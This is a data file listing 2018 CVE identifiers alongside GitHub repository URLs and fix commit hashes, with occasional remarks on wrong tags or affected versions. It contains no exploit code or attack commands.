-CVE-2018-3715;https://github.com/jarofghosts/glance;None:None;False;8cfd88e44ebd3f07e3a2eaf376a3e758b6c4ca19; -CVE-2018-3721;https://github.com/lodash/lodash;None:None;False;d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a; -CVE-2018-3726;https://github.com/omphalos/crud-file-server;None:None;False;4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa; -CVE-2018-3728;https://github.com/hapijs/hoek;None:None;False;32ed5c9413321fbc37da5ca81a7cbab693786dee,5aed1a8c4a3d55722d1c799f2368857bf418d6df,623667e4ed606841137af84173c588667c8e882d; -CVE-2018-3731;https://github.com/tnantoka/public;None:None;False;eae8ad8017b260f8667ded5e12801bd72b877af2; this repo has no tag, -CVE-2018-3732;https://github.com/pillarjs/resolve-path;None:None;False;fe5b8052cafd35fcdafe9210e100e9050b37d2a0; -CVE-2018-3733;https://github.com/omphalos/crud-file-server;None:None;False;4fc3b404f718abb789f4ce4272c39c7a138c7a82; -CVE-2018-3738;https://github.com/protobufjs/protobuf.js;None:None;False;2ee1028d631a328e152d7e09f2a0e0c5c83dc2aa; -CVE-2018-3740;https://github.com/rgrove/sanitize;None:None;False;01629a162e448a83d901456d0ba8b65f3b03d46e; -CVE-2018-3741;https://github.com/rails/rails-html-sanitizer;None:None;False;f3ba1a839a35f2ba7f941c15e239a1cb379d56ae; -CVE-2018-3743;https://github.com/herber/hekto;None:None;False;408dd526e706246e2c2f378580c66036b768520e,1e5c75f8259ba0daf9b2600db3c246cda1934c46; -CVE-2018-3750;https://github.com/unclechu/node-deep-extend;None:None;False;9423fae877e2ab6b4aecc4db79a0ed63039d4703; -CVE-2018-3757;https://github.com/roest01/node-pdf-image;None:None;False;54679496a89738443917608c2bbe2f6e5dd20e83,15c13846a966c8513e30aff58471163a872b3b6d; -CVE-2018-3758;https://github.com/mrvautin/expressCart;None:None;False;65b18cfe426fa217aa6ada1d4162891883137893; -CVE-2018-3759;https://github.com/jtdowney/private_address_check;None:None;False;4068228187db87fea7577f7020099399772bb147; -CVE-2018-3769;https://github.com/ruby-grape/grape;None:None;False;6876b71efc7b03f7ce1be3f075eaa4e7e6de19af; -CVE-2018-3774;https://github.com/unshiftio/url-parse;None:None;False;53b1794e54d0711ceb52505e0f74145270570d5a; -CVE-2018-3777;https://github.com/restforce/restforce;None:None;False;fd31f1cb09d8363a27e6786ba1754941a1980eed,9765e0dd9b0e5408b4390aa51962641731d282d5; -CVE-2018-3778;https://github.com/moscajs/aedes;None:None;False;ffbc1702bb24b596afbb96407cc6db234a4044a8; fixed version is vulnerable (changed) -CVE-2018-3786;https://github.com/eggjs/egg-scripts;None:None;False;b98fd03d1e3aaed68004b881f0b3d42fe47341dd; -CVE-2018-5773;https://github.com/trentm/python-markdown2;None:None;False;1fb702d650d35f7a6fee7f8dbe819e53ceaff53e,c86fce76472a8bb0b94f5396b3ca8db7d3591bcd,1b1dcdd727c0ef03453b9f5ef5ae3679f1d72323,9fc2a371d174b4f253c6b8985eedd41ce90e42f0; -CVE-2018-5968;https://github.com/FasterXML/jackson-databind;None:None;False;038b471e2efde2e8f96b4e0be958d3e5a1ff1d05; -CVE-2018-6333;https://github.com/facebookarchive/nuclide;None:None;False;65f6bbd683404be1bb569b8d1be84b5d4c74a324; -CVE-2018-6341;https://github.com/facebook/react;None:None;False;5b19684fc3eddb44a790f31804707de9234147c7,ff41519ec2fea37643ecae7f87f8e15856247faf; -CVE-2018-6517;https://github.com/puppetlabs/chloride;None:None;False;592b5730dd910a4eae7abf8c94f1a2d990411074,0c70420f3e6133ecaaa9bb9cb079dc55cacd8d17; -CVE-2018-6591;https://github.com/conversejs/converse.js;None:None;False;ba09996998df38a5eb76903457fbb1077caabe25; -CVE-2018-6596;https://github.com/anymail/django-anymail;None:None;False;c07998304b4a31df4c61deddcb03d3607a04691b,db586ede1fbb41dce21310ea28ae15a1cf1286c5; -CVE-2018-6873;https://github.com/auth0/auth0.js;None:None;False;c9c5bd414324fbab071aaa29dcc11af4ca73181b; vulnerable tag is fixed -CVE-2018-7212;https://github.com/sinatra/sinatra;None:None;False;6bcc6c3499b0fae52900ae31e63676a22d4e6a72,d17aa95f5056c52daf5d7c3170fbfd831dc96381,ba7af51bd713267910078d055d01469e836fd64f; advisory links the wrong commit -CVE-2018-7260;https://github.com/phpmyadmin/composer;None:None;False;d2886a3e8745e8845633ae8a0054b5ee4d8babd5; -CVE-2018-7408;https://github.com/npm/npm;None:None;False;74e149da6efe6ed89477faa81fef08eee7999ad0; -CVE-2018-7489;https://github.com/FasterXML/jackson-databind;None:None;False;6799f8f10cc78e9af6d443ed6982d00a13f2e7d2,e66c0a9d3c926ff1b63bf586c824ead1d02f2a3d; -CVE-2018-7560;https://github.com/myshenin/aws-lambda-multipart-parser;None:None;False;56ccb03af4dddebc2b2defb348b6558783d5757e; -CVE-2018-7575;https://github.com/tensorflow/tensorflow;None:None;False;32298e892ae8186fba54f58ecbace840ef65f635,2006ef57602012939dc10d7e8961925b320d3ef6,d107fee1e4a9a4462f01564798d345802acc2aef; -CVE-2018-7576;https://github.com/tensorflow/tensorflow;None:None;False;c48431588e7cf8aff61d4c299231e3e925144df8; was 1.6.0:1.7.0 -CVE-2018-7651;https://github.com/zkat/ssri;None:None;False;d0ebcdc22cb5c8f47f89716d08b3518b2485d65d; -CVE-2018-7711;https://github.com/simplesamlphp/saml2;None:None;False;93fef13dea9c46dc238eb59e414d3ae76559d8c4,5d69753a61b4bfb95eed3ea0c3f8cbb4e6e0ad2f,4f6af7f69f29df8555a18b9bb7b646906b45924d; -CVE-2018-7750;https://github.com/paramiko/paramiko;None:None;False;118c0ec84a60e6d6fa0034922f7cb5011d4a07d5,e9dfd854bdaf8af15d7834f7502a0451d217bb8c,fa29bd8446c8eab237f5187d28787727b4610516; -CVE-2018-7753;https://github.com/mozilla/bleach;None:None;False;c5df5789ec3471a31311f42c2d19fc2cf21b35ef; -CVE-2018-8006;https://github.com/apache/activemq;None:None;False;d8c80a98212ee5d73a281483a2f8b3f517465f62,2373aa1320dec90a60d69001adcb0ce856d61d10; -CVE-2018-8008;https://github.com/apache/storm;None:None;False;1117a37b01a1058897a34e11ff5156e465efb692,0fc6b522487c061f89e8cdacf09f722d3f20589a,efad4cca2d7d461f5f8c08a0d7b51fabeb82d0af,f61e5daf299d6c37c7ad65744d02556c94a16a4b; -CVE-2018-8009;https://github.com/apache/hadoop;None:None;False;eaa2b8035b584dfcf7c79a33484eb2dffd3fdb11,11a425d11a329010d0ff8255ecbcd1eb51b642e3,6d7d192e4799b51931e55217e02baec14d49607b,bd98d4e77cf9f7b2f4b1afb4d5e5bad0f6b2fde3,cedc28d4ab2a27ba47e15ab2711218d96ec88d23,65e55097da2bb3f2fbdf9ba1946da25fe58bec98,12258c7cff8d32710fbd8b9088a930e3ce27432e,1373e3d8ad60e4da721a292912cb69243bfdf470,6a4ae6f6eeed1392a4828a5721fa1499f65bdde4,fc4c20fc3469674cb584a4fb98bac7e3c2277c96,e3236a9680709de7a95ffbc11b20e1bdc95a8605,745f203e577bacb35b042206db94615141fa5e6f,45a1c680c276c4501402f7bc4cebcf85a6fbc7f5; -CVE-2018-8013;https://github.com/apache/xmlgraphics-batik;None:None;False;c5e5734293920250f2876648ac93660afc1d2923; -CVE-2018-8014;https://github.com/apache/tomcat;None:None;False;d83a76732e6804739b81d8b2056365307637b42d,5877390a9605f56d9bd6859a54ccbfb16374a78b,60f596a21fd6041335a3a1a4015d4512439cecb5; -CVE-2018-8016;https://github.com/apache/cassandra;None:None;False;28ee665b3c0c9238b61a871064f024d54cddcc79; -CVE-2018-8017;https://github.com/apache/tika;None:None;False;62926cae31a02d4f23d21148435804b96c543cc7,45a1c680c276c4501402f7bc4cebcf85a6fbc7f5; -CVE-2018-8025;https://github.com/apache/hbase;None:None;False;f6c4405929055c7e3d7135f49015dfac707c58d6,5f03fb399c13ff1eebf4067af6dc11cdded1694d,f7e50346322c6ba0ee46e64c07677e9ea052718e,7c1366de453989f115935c1db31d082d6ef3f868,30e98b4455f971c9cb3c02ac7b2daeebe4ee6f2d,bf25c1cb7221178388baaa58f0b16a408e151a69,625d4d002620139f49c8201f95b789b6a715cd41,dbebacbcfcbf66fbddb7e1b4a416c89e39831c5b,0c42acbdf86d08af3003105a26a2201f75f2e2c3; -CVE-2018-8026;https://github.com/apache/lucene-solr;None:None;False;e21d4937e0637c7b7949ac463f331da9a42c07f9,d1baf6ba593561f39e2da0a71a8440797005b55c,3aa6086ed99fa7158d423dc7c33dae6da466b093,e5407c5a9710247e5f728aae36224a245a51f0b1,1880d4824e6c5f98170b9a00aad1d437ee2aa12b; fixed version is vulnerable -CVE-2018-8027;https://github.com/apache/camel;None:None;False;24eefa559fe6b310629d2bf00663d2679ec81b96,3fe03e361725b66c1c3eaa40bb11577fb3dc17b3,8467d644813a62f3a836c0c7dee8cf5a41de3c07; -CVE-2018-8030;https://github.com/apache/qpid-broker-j;None:None;False;881323e56620ea069d52885842652a6fbf3403c0,025b48f3193e2b10b1c41d2bc3bcfc9cfc238a27; -CVE-2018-8031;https://github.com/apache/tomee;None:None;False;b8bbf50c23ce97dd64f3a5d77f78f84e47579863; -CVE-2018-8037;https://github.com/apache/tomcat;None:None;False;ed4b9d791f9470e4c3de691dd0153a9ce431701b,ccf2e6bf5205561ad18c2300153e9173ec509d73; was 9.0.9:9.0.10 -CVE-2018-8038;https://github.com/apache/cxf-fediz;None:None;False;4c396acb42439e61cc63b0452dd22442d720b61b,b6ed9865d0614332fa419fe4b6d0fe81bc2e660d; -CVE-2018-8039;https://github.com/apache/cxf;None:None;False;8ed6208f987ff72e4c4d2cf8a6b1ec9b27575d4b,fae6fabf9bd7647f5e9cb68897a7d72b545b741b; -CVE-2018-8088;https://github.com/qos-ch/slf4j;None:None;False;d2b27fba88e983f921558da27fc29b5f5d269405,c15d3c1dab0c3398011dec3a16ad3e45b75ae70d,918a055bdf87867f69693cf82727fa435c489e25; tracer commit misses the good one -CVE-2018-8097;https://github.com/pyeve/eve;None:None;False;57c320b925164dbc579355b0a06affa903f2ca1f,f8f7019ffdf9b4e05faf95e1f04e204aa4c91f98; -CVE-2018-8128;https://github.com/chakra-core/ChakraCore;None:None;False;23848b1272067625ab50115c6f30a0b177c633ba; -CVE-2018-8177;https://github.com/chakra-core/ChakraCore;None:None;False;eb4b00bcd61a56d5ac66f4155870cba3178d3273; -CVE-2018-8178;https://github.com/chakra-core/ChakraCore;None:None;False;c8f723d99c484c3a31df2187cdd2893ac27506a3; -CVE-2018-8315;https://github.com/Microsoft/ChakraCore;None:None;False;e03b3e30160ac5846b246931634962ce6bd1db83; -CVE-2018-8359;https://github.com/chakra-core/ChakraCore;None:None;False;f8bdb180c4e9351f441e25dc818815d0c63af753; -CVE-2018-8381;https://github.com/chakra-core/ChakraCore;None:None;False;1b77d559416116f9719febb7dee3354150277588; -CVE-2018-8390;https://github.com/chakra-core/ChakraCore;None:None;False;63ae30a750a4a0b2a2eb61a35dd3d2fc10104a90; -CVE-2018-8416;https://github.com/dotnet/corefx;None:None;False;dabb4f5dc837550dc6835a7be9a6db8b8fd5fdc7,85b40be5e2df53df1b667442c0717242266d7b3f,c50af3eee993880dc31877dd596356639b2ee1f0,a0fcd23ace1c8d692988cd0da4391cf7bf5e0ce6; vulnerable tag is fixed -CVE-2018-8465;https://github.com/chakra-core/ChakraCore;None:None;False;7e235c914df50f4bb42efad55a7527350a7cc7ae; -CVE-2018-8473;https://github.com/Microsoft/ChakraCore;None:None;False;a27864395a53f0ebe27a71a004265c28383a4385; -CVE-2018-8510;https://github.com/chakra-core/ChakraCore;None:None;False;9b36ce832c9a81bb51e3b1a39067feadcd1e14d2; -CVE-2018-8541;https://github.com/chakra-core/ChakraCore;None:None;False;3bee8f018e15c803d87d8b2981d0522f6d58ecac; -CVE-2018-8899;https://github.com/IdentityServer/IdentityServer4;None:None;False;ce8a487521f87b8593bfb0cab14d7ebaed42079b,21d0da227f50ac102de469a13bc5a15d2cc0f895; -CVE-2018-9109;https://github.com/Studio-42/elFinder;None:None;False;157f471d7e48f190f74e66eb5bc73360b5352fd3; -CVE-2018-9110;https://github.com/Studio-42/elFinder;None:None;False;e6351557b86cc10a7651253d2d2aff7f6b918f8e; -CVE-2018-9206;https://github.com/blueimp/jQuery-File-Upload;None:None;False;aeb47e51c67df8a504b7726595576c1c66b5dc2f; -CVE-2018-9856;https://github.com/Kotti/Kotti;None:None;False;00b56681fa9fb8587869a5e00dcd56503081d3b9,69d3c8a5d7203ddaec5ced5901acf87baddd76be; -CVE-2018-10055;https://github.com/tensorflow/tensorflow;None:None;False;111e04aed22fdeed494580dae127720326c1b8ee,3c1d5bc91be37396c73060bf123ead784741c6ef,3a279f15fde94882c27670dee313ce501cba92b9,c89ab82a82585cdaa90bf4911980e9e845909e78; -CVE-2018-10092;https://github.com/Dolibarr/dolibarr;None:None;False;5d121b2d3ae2a95abebc9dc31e4782cbc61a1f39; -CVE-2018-10094;https://github.com/Dolibarr/dolibarr;None:None;False;7ade4e37f24d6859987bb9f6232f604325633fdd; -CVE-2018-10095;https://github.com/Dolibarr/dolibarr;None:None;False;1dc466e1fb687cfe647de4af891720419823ed56; -CVE-2018-10188;https://github.com/phpmyadmin/phpmyadmin;None:None;False;c6dd6b56e236a3aff953cee4135ecaa67130e641; -CVE-2018-10237;https://github.com/google/guava;None:None;False;7ec8718f1e6e2814dabaa4b9f96b6b33a813101c,f89ece5721b2f637fe754937ff1f3c86d80bb196; -CVE-2018-10366;https://github.com/rainlab/user-plugin;None:None;False;098c2bc907443d67e9e18645f850e3de42941d20; -CVE-2018-10862;https://github.com/wildfly/wildfly-core;None:None;False;77ea76eb5651ed1daf40a681a990bb65018d9535,40996ae6d5d3b6c1602a15f96b86a8d8a39b53eb; -CVE-2018-10903;https://github.com/pyca/cryptography;None:None;False;d4378e42937b56f473ddade2667f919ce32208cb; -CVE-2018-10912;https://github.com/keycloak/keycloak;None:None;False;40d129cf541e85e8d0d04a990be6e7954a0a5d2b,c64ecb1ab84e66fcb486423c1978d3b83852e8d2; -CVE-2018-10936;https://github.com/pgjdbc/pgjdbc;None:None;False;cdeeaca47dc3bc6f727c79a582c9e4123099526e; -CVE-2018-11039;https://github.com/spring-projects/spring-framework;None:None;False;dac97f1b7dac3e70ff603fb6fc9f205b95dd6b01,f2694a8ed93f1f63f87ce45d0bb638478b426acd,323ccf99e575343f63d56e229c25c35c170b7ec1; -CVE-2018-11040;https://github.com/spring-projects/spring-framework;None:None;False;b80c13b722bb207ddf43f53a007ee3ddc1dd2e26,874859493bbda59739c38c7e52eb3625f247b93a; -CVE-2018-11087;https://github.com/spring-projects/spring-amqp;None:None;False;444b74e95bb299af5e23ebf006fbb45d574fb95e,d64e7fa3993dac577c0973e0caf8c31d27ef5e44; -CVE-2018-11093;https://github.com/ckeditor/ckeditor5-link;None:None;False;8cb782eceba10fc481e4021cb5d25b2a85d1b04e; -CVE-2018-11248;https://github.com/lingochamp/FileDownloader;None:None;False;e8dd7724c9243b21181eb3d27a1715ed811ccfde,ff240b883490a84744705f9b4165719d7633f902,b023cc081bbecdd2a9f3549a3ae5c12a9647ed7f; -CVE-2018-11307;https://github.com/FasterXML/jackson-databind;None:None;False;27b4defc270454dea6842bd9279f17387eceb737,051bd5e447fbc9539e12a4fe90eb989dba0c656e,78e78738d69adcb59fdac9fc12d9053ce8809f3d; -CVE-2018-11627;https://github.com/sinatra/sinatra;None:None;False;12786867d6faaceaec62c7c2cb5b0e2dc074d71a,3742bddcee8eb5afd69cf51327c1716c506e1adc; -CVE-2018-11647;https://github.com/jaredhanson/oauth2orize-fprm;None:None;False;2bf9faee787eb004abbdfb6f4cc2fb06653defd5,d48b4dd0e5a25ee2094725d98c35e468f027afd8; -CVE-2018-11758;https://github.com/apache/cayenne;None:None;False;6fc896b65ed871be33dcf453cde924bf73cf83db,8d4c83abed024fc3a698148a122429022b89b590; -CVE-2018-11761;https://github.com/apache/tika;None:None;False;4e67928412ad56333d400f3728ecdb59d07d9d63,148adec1016acc122fa5e972f75d7029376998d9,bd9d75d8b0a85af2937047bfad04288c3044b2a6; -CVE-2018-11762;https://github.com/apache/tika;None:None;False;a09d853dbed712f644e274b497cce254f3189d57,c0fb57d9d20e8eb7cb77bce8742e4566a18f5db8; -CVE-2018-11771;https://github.com/apache/commons-compress;None:None;False;a41ce6892cb0590b2e658704434ac0dbcb6834c8; -CVE-2018-11775;https://github.com/apache/activemq;None:None;False;02971a40e281713a8397d3a1809c164b594abfbb,1e31df9800fc2db258f2458628bd9863c11b2846,69fad2a135689f6c31fbada1c397f2e0dfd90d3c,bde7097fb8173cf871827df7811b3865679b963d; -CVE-2018-11777;https://github.com/apache/hive;None:None;False;f0419dfaabe31dd7802c37aeebab101265907e1a,00c0ee7bc4b8492476b377a6edafcc33411f14b6,1a1d6ca1bc3ae840238dc345fa1eb2c7c28c8cb0; -CVE-2018-11784;https://github.com/apache/tomcat;None:None;False;efb860b3ff8ebcf606199b8d0d432f76898040da; -CVE-2018-11786;https://github.com/apache/karaf;None:None;False;103f33105a58c899706a0687bb334678e2fa1ee7,24fb477ea886e8f294dedbad98d2a2c4cb2a44f9; -CVE-2018-11787;https://github.com/apache/karaf;None:None;False;cfa213ad680ded70b70bf0c648891a06386ef632,434e52502528e91e20d2f87cec7732f1e6e554c2,1fc60d7792e1aa35970b8d967f88ca3381053172; -CVE-2018-11788;https://github.com/apache/karaf;None:None;False;cc3332e97fa53a579312894d08e383f321a96aed,0c36c50bc158739c8fc8543122a6740c54adafca; -CVE-2018-11797;https://github.com/apache/pdfbox;None:None;False;ea7d321b6e23cf017437846bcee4de19784cf6c8,bb5defd088bebd566d126df079d35b356ba0534a,2db39c139d935a8ba03e1ae3c012d2d41dd6912a; -CVE-2018-11798;https://github.com/apache/thrift;None:None;False;2a2b72f6c8aef200ecee4984f011e06052288ff2; -CVE-2018-11804;https://github.com/apache/spark;None:None;False;c21d7e1bb958a0cfa4cba34a688d594466088c9e,ac586bbb016d70c60b1bd2ea5320fd56c3a8eead,8906696ac2089f3d6500b0496af7d9995c7de99b,d7a35877b96dce8b742acf77e79bda189e402ae2; commits do not have tags,wrong versions, only 2.x.y are affected according to spark advisory -CVE-2018-12022;https://github.com/FasterXML/jackson-databind;None:None;False;7487cf7eb14be2f65a1eb108e8629c07ef45e0a1,28badf7ef60ac3e7ef151cd8e8ec010b8479226a; -CVE-2018-12023;https://github.com/FasterXML/jackson-databind;None:None;False;7487cf7eb14be2f65a1eb108e8629c07ef45e0a1,28badf7ef60ac3e7ef151cd8e8ec010b8479226a; -CVE-2018-12043;https://github.com/symphonycms/symphonycms;None:None;False;1ace6b31867cc83267b3550686271c9c65ac3ec0; -CVE-2018-12418;https://github.com/junrar/junrar;None:None;False;ad8d0ba8e155630da8a1215cee3f253e0af45817; -CVE-2018-12537;https://github.com/eclipse-vertx/vert.x;None:None;False;3a6512695a9d610687081eb13d2a1681151fd7fb,1bb6445226c39a95e7d07ce3caaf56828e8aab72; -CVE-2018-12540;https://github.com/vert-x3/vertx-web;None:None;False;f42b193b15a29b772fc576b2d0f2497e7474a7e9,98891b1d9e022b467a3e4674aca4d1889849b1d5; -CVE-2018-12541;https://github.com/eclipse-vertx/vert.x;None:None;False;269a583330695d1418a4f5578f7169350b2e1332; -CVE-2018-12544;https://github.com/vert-x3/vertx-web;None:None;False;ea0b0930fbc122b7114935cafa379facc9611587,3fcb0036dc11f22ea232f61cfff31b29a6b6eca4,26db16c7b32e655b489d1a71605f9a785f788e41,ac8692c618d6180a9bc012a2ac8dbec821b1a973,d814d22ade14bafec47c4447a4ba9bff090f05e8; -CVE-2018-12557;https://github.com/openstack-infra/zuul;None:None;False;ffe7278c08e6e36bf8b18f732c764e00ff51551e; -CVE-2018-12608;https://github.com/moby/moby;None:None;False;ddd5278b07b1c2b12b906244153fd9340e0d7910,190c6e8cf8b893874a33d83f78307f1bed0bfbcd; -CVE-2018-12615;https://github.com/phusion/passenger;None:None;False;4e97fdb86d0a0141ec9a052c6e691fcd07bb45c8; -CVE-2018-12976;https://github.com/golang/gddo;None:None;False;daffe1f90ec57f8ed69464f9094753fc6452e983; -CVE-2018-13447;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; -CVE-2018-13448;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; -CVE-2018-13449;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; -CVE-2018-13450;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; -CVE-2018-13790;https://github.com/concretecms/concretecms;None:None;False;dc742c1ec83b992cd02d70ae19ee190bbed0b3e8; -CVE-2018-13797;https://github.com/scravy/node-macaddress;None:None;False;358fd594adb196a86b94ac9c691f69fe5dad2332; -CVE-2018-13818;https://github.com/twigphp/Twig;None:None;False;eddb97148ad779f27e670e1e3f19fb323aedafeb; -CVE-2018-13863;https://github.com/mongodb/js-bson;None:None;False;511ecc487ea57f554a0d199206a58efbc9cd121c,bd61c45157c53a1698ff23770160cf4783e9ea4a; -CVE-2018-14040;https://github.com/twbs/bootstrap;None:None;False;2a5ba23ce8f041f3548317acc992ed8a736b609d,149096016f70fd815540d62c0989fd99cdc809e0; -CVE-2018-14041;https://github.com/twbs/bootstrap;None:None;False;cc61edfa8af7b5ec9d4888c59bf94377e499b78b; -CVE-2018-14042;https://github.com/twbs/bootstrap;None:None;False;2d90d369bbc2bd2647620246c55cec8c4705e3d0; -CVE-2018-14371;https://github.com/eclipse-ee4j/mojarra;None:None;False;475c71e282d695fbbb1946a75e267d1b8d9d7503,1b434748d9239f42eae8aa7d37d7a0930c061e24; -CVE-2018-14574;https://github.com/django/django;None:None;False;a656a681272f8f3734b6eb38e9a88aa0d91806f1,d6eaee092709aad477a9894598496c6deec532ff,c4e5ff7fdb5fce447675e90291fd33fddd052b3c,6fffc3c6d420e44f4029d5643f38d00a39b08525; -CVE-2018-14635;https://github.com/openstack/neutron;None:None;False;13631ff187b6c2c6eec4f356a917288560dc5886,54aa6e81cb17b33ce4d5d469cc11dec2869c762d,8287d7f546e4ffe7a2ac32df50d6b465484f81cc,988eceac27a9ad91775376b3b3fedf84963663a5,c1d2f13495b2eb925be6495840795ead5929fd0e,773c5595b5c79b216d37787fd2ba5a989d48868a; -CVE-2018-14637;https://github.com/keycloak/keycloak;None:None;False;0fe0b875d63cce3d2855d85d25bb8757bce13eb1; -CVE-2018-14642;https://github.com/undertow-io/undertow;None:None;False;dc22648efe16968242df5d793e3418afafcb36c0,c46b7b49c5a561731c84a76ee52244369af1af8a; -CVE-2018-14718;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; -CVE-2018-14719;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; -CVE-2018-14720;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; -CVE-2018-14721;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; -CVE-2018-14731;https://github.com/parcel-bundler/parcel;None:None;False;066e0bf6bd26b15c78bd47df023452e4b20073e4,92b5c0830662f8baebc6fd4eadfd5ddd3de963a3; -CVE-2018-14732;https://github.com/webpack/webpack-dev-server;None:None;False;f18e5adf123221a1015be63e1ca2491ca45b8d10,b3217ca8dc6b371a160b6749b949ab09d7b9f6d7,c42d0da513ac6ee0b48a17b0f6b7830da7c9c2c9; -CVE-2018-14774;https://github.com/symfony/symfony;None:None;False;9cfcaba0bf71f87683510b5f47ebaac5f5d6a5ba,08a32d44b62275b3c6499493dd95e099c84daf60,0f7667d6430eb6529d84a29d7aa83991d1ac4fd0,67044af83d61cfef81349c7add4ade5369acf339,96504fb8c9f91204727d2930eb837473ce154956,1db2d2eda82c8bc031ccd9b85326c0860e5899a2,7f912bbb78377c2ea331b3da28363435fbd91337,974240e178bb01d734bf1df1ad5c3beba6a2f982,bcf5897bb1a99d4acae8bf7b73e81bfdeaac0922,725dee4cd8b4ccd52e335ae4b4522242cea9bd4a; -CVE-2018-14840;https://github.com/intelliants/subrion;None:None;False;b12e287d3814c0f2d0b1892f95fc0190972d2ba5; -CVE-2018-15178;https://github.com/gogs/gogs;None:None;False;1f247cf8139cb483276cd8dd06385a800ce9d4b2; -CVE-2018-15531;https://github.com/javamelody/javamelody;None:None;False;ef111822562d0b9365bd3e671a75b65bd0613353; -CVE-2018-15727;https://github.com/grafana/grafana;None:None;False;df83bf10a225811927644bdf6265fa80bdea9137,7baecf0d0deae0d865e45cf03e082bc0db3f28c3,92ed1f04afcdead02fe3a8bf53caecc89db1c5dc; -CVE-2018-15756;https://github.com/spring-projects/spring-framework;None:None;False;423aa28ed584b4ff6e5bad218c09beef5e91951e,044772641d12b9281185f6cf50f8485b8747132c,c8e320019ffe7298fc4cbeeb194b2bfd6389b6d9; -CVE-2018-15758;https://github.com/spring-projects/spring-security-oauth;None:None;False;ddd65cd9417ae1e4a69e4193a622300db38e2ef1,4082ec7ae3d39198a47b5c803ccb20dacefb0b09,f92223afc71687bd3156298054903f50aa71fbf9; -CVE-2018-16329;https://github.com/ImageMagick/ImageMagick;None:None;False;2c75f301d9ac84f91071393b02d8c88c8341c91c; -CVE-2018-16459;https://github.com/exceljs/exceljs;None:None;False;9066cd89a9fad055166b53ce9e75a42e7636bac1; -CVE-2018-16462;https://github.com/vincentmorneau/apex-publish-static-files;None:None;False;2209af8f2b65c24aa55ab757e0e05b958c16f063; -CVE-2018-16468;https://github.com/flavorjones/loofah;None:None;False;71e4b5434fbcb2ad87643f0c9fecfc3a847943c4,be0fd3ac0fad452730f10e318fa31706257fd081; -CVE-2018-16470;https://github.com/rack/rack;None:None;False;37c1160b2360074d20858792f23a7eb3afeabebd; -CVE-2018-16471;https://github.com/rack/rack;None:None;False;97ca63d87d88b4088fb1995b14103d4fe6a5e594,313dd6a05a5924ed6c82072299c53fed09e39ae7,e5d58031b766e49687157b45edab1b8457d972bd; -CVE-2018-16472;https://github.com/ashaffer/cached-path-relative;None:None;False;a43cffec84ed0e9eceecb43b534b6937a8028fc0; -CVE-2018-16485;https://github.com/nunnly/m-server;None:None;False;01f13f040d1961ca3146dce7e2db990156e65e9a; tag-to-version gets the wrong next tag it should stay empty. The commit has no tag -CVE-2018-16490;https://github.com/aheckmann/mpath;None:None;False;fe732eb05adebe29d1d741bdf3981afbae8ea94d; -CVE-2018-16492;https://github.com/justmoon/node-extend;None:None;False;0e68e71d93507fcc391e398bc84abd0666b28190; -CVE-2018-16733;https://github.com/ethereum/go-ethereum;None:None;False;106d196ec4a6451efedc60ab15957f231fa85639,ecca49e078ace5f867cccdf5c291e3e84dc19982; -CVE-2018-16837;https://github.com/ansible/ansible;None:None;False;a0aa53d1a1d6075a7ae98ace138712ee6cb45ae4,b618339c321c387230d3ea523e80ad47af3de5cf,f50cc0b8cb399bb7b7c1ad23b94c9404f0cc6d23,77928e6c3a2ad878b20312ce5d74d9d7741e0df0; version retrieved from redhat otherwise there were none in the NVD -CVE-2018-16859;https://github.com/ansible/ansible;None:None;False;0d746b4198abf84290a093b83cf02b4203d73d9f,4d748d34f9392aa469da00a85c8e2d5fe6cec52b,2f8d3fcf41107efafc14d51ab6e14531ca8f8c87,8c1f701e6e9df29fe991f98265e2dd76acca4b8c; vulnerable tag is fixed -CVE-2018-16876;https://github.com/ansible/ansible;None:None;False;0954942dfdc563f80fd3e388f550aa165ec931da,424c68f15ad9f532d73e5afed33ff477f54281a7,e0a81d133ffc8f7067182c53cf6a28c724dd1099,ba4c2ebeac9ee801bfedff05f504c71da0dd2bc2; -CVE-2018-16886;https://github.com/etcd-io/etcd;None:None;False;c7f744d6d373e91cc300cd73de9d00b6166f36f1,a2b420c3642a3e4dfefccf3a2ef5b57906206ed9,bf9d0d8291dc71ecbfb2690612954e1a298154b2; -CVE-2018-16984;https://github.com/django/django;None:None;False;bf39978a53f117ca02e9a0c78b76664a41a54745,c4bd5b597e0aa2432e4c867b86650f18af117851; -CVE-2018-17057;https://github.com/tecnickcom/TCPDF;None:None;False;ac6e92fccc7d9383dfd787056831349621b1aca2,1861e33fe05f653b67d070f7c106463e7a5c26ed; -CVE-2018-17104;https://github.com/microweber/microweber;None:None;False;982ea9d5efb7d2306a05644ebc3469dadb33767e; -CVE-2018-17175;https://github.com/marshmallow-code/marshmallow;None:None;False;d5d9cb22dda6f39117f6f9497a6a66813cb8c64f,98f2b4759c9a7c7ac5e790727d47f2b328520713; -CVE-2018-17184;https://github.com/apache/syncope;None:None;False;73aed0a741b1255f45893e3cada6501473350738,36fb466afd64894170fa5e2e030ce6895120b1af,b25a8834db2cc7ea45707a1218e85e0475684270; -CVE-2018-17187;https://github.com/apache/qpid-proton-j;None:None;False;0cb8ca03cec42120dcfc434561592d89a89a805e; -CVE-2018-17193;https://github.com/apache/nifi;None:None;False;e62aa0252dfcf34dff0c3a9c51265b1d0f9dfc9f; -CVE-2018-17194;https://github.com/apache/nifi;None:None;False;748cf745628dab20b7e71f12b5dcfe6ed0bbf134; -CVE-2018-17195;https://github.com/apache/nifi;None:None;False;246c090526143943557b15868db6e8fe3fb30cf6; -CVE-2018-17197;https://github.com/apache/tika;None:None;False;0c49c851979163334ea05cbebdd11ff87feba62d; 